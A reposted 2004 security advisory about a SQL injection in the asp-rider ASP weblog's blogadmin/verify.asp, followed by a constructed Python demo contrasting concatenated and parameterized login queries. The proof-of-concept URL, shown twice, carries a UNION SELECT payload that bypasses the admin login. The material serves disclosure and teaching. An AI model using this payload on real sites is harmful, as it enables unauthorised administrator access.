[Repost] asp-rider SQL Injection Vulnerability
Source: [url]www.karchack.com[/url]
Affected software description:
asp-rider is a full Farsi weblog written in ASP
[url]www.asp-rider.com[/url]
--------------------------------------
Vulnerabilities:
The file verify.asp in the blogadmin folder is vulnerable to a SQL injection attack.
-------------------------------------
Proof of concept:
You can easily log in to the weblog administrator page by entering:
[url]www.site.com/weblog/blogadmin/verify.asp?username=[/url]'union select 1,1,1,1,1,1,1,1 from tbl_users where ''='&password=1
-------------------------------------
This vulnerability is already patched.
[url]www.karchack.com[/url]
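[url]www.karchack.net[/url]
Article source:
[url]http://marc.theaimsgroup.com/l=bugtraq&m=110305802005220&w=2[/url]
Publication date:
2004-12-14 21:00:20
Affected software description:
asp-rider is a full-featured weblog program written in ASP.
([url]www.asp-rider.com[/url])
Vulnerability description:
verify.asp in the blogadmin directory has a SQL injection vulnerability.
Vulnerability test:
You can enter the following URL
[url]www.site.com/weblog/blogadmin/verify.asp?username=[/url]'union select 1,1,1,1,1,1,1,1 from tbl_users where ''='&password=1
to log in to the administration interface.
Solution:
The vulnerability has been patched.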
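
Why the username value in the proof of concept passes a login check, and why binding parameters stops it, as an added example that is not part of the original advisory or asp-rider's code. Assumptions: the page does not show verify.asp or say how it was patched, so the query shape, the column names other than tbl_users, the sample account, and the use of SQLite as a stand-in database are all constructed for illustration.

```python
import sqlite3

# Constructed schema: eight columns, so the advisory's 8-column UNION lines up
# with SELECT *. The real columns of asp-rider's tbl_users are not on the page.
COLS = "id, username, password, c4, c5, c6, c7, c8"

# The username value taken from the advisory's proof-of-concept URL.
POC_USERNAME = "'union select 1,1,1,1,1,1,1,1 from tbl_users where ''='"


def make_db():
    """In-memory stand-in for the weblog database with one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute(f"CREATE TABLE tbl_users ({COLS})")
    db.execute(
        "INSERT INTO tbl_users VALUES (1,'admin','s3cret-constructed',0,0,0,0,0)"
    )
    return db


def login_concat(db, username, password):
    """Assumed 'before' shape: request values are spliced into the SQL text,
    so a quote in the input ends the string literal and the rest is parsed
    as SQL. Any returned row is treated as a successful login."""
    sql = ("SELECT * FROM tbl_users WHERE password='" + password +
           "' AND username='" + username + "'")
    return db.execute(sql).fetchone() is not None


def login_param(db, username, password):
    """Hardened form: values are bound as data and never parsed as SQL,
    so the whole input is compared literally against the username column."""
    sql = "SELECT * FROM tbl_users WHERE password=? AND username=?"
    return db.execute(sql, (password, username)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    for name, check in (("concatenated", login_concat), ("parameterized", login_param)):
        print(name, "valid login:", check(db, "admin", "s3cret-constructed"))
        print(name, "PoC username:", check(db, POC_USERNAME, "1"))
```

In classic ASP the equivalent of `login_param` is an `ADODB.Command` with `?` placeholders and appended parameters instead of string concatenation.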